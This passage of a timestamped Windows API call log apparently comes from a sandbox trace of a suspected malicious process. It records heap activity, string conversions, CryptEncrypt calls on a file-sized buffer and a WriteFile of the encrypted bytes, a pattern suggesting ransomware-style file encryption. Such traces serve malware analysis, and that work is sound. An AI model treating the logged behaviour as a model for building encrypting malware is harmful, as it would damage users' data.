(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0102.694] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0102.695] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0102.695] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.696] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74118 | out: hHeap=0x2af0000) returned 1 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.696] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0102.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0102.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0102.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0102.696] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0102.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0102.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0102.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0102.697] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0102.697] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0102.697] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0102.697] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7fc80 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0102.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.700] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2da0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2da8) returned 1 [0102.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.700] CharLowerBuffW (in: lpsz="byte[11688]", cchLength=0xb | out: lpsz="byte[11688]") returned 0xb [0102.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.700] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.701] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.701] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.701] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.701] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.701] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a7fc80*, pdwDataLen=0x8cef60*=0x2da0, dwBufLen=0x2da8 | out: pbData=0x2a7fc80*, pdwDataLen=0x8cef60*=0x2da8) returned 1 [0102.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.702] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0102.702] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.702] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0102.702] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.702] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.702] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0102.702] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.702] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0102.702] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.702] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.702] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.702] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.702] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.702] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.702] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.702] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.737] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.737] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.737] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.739] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x2da8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x2da8, lpOverlapped=0x0) returned 1 [0102.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 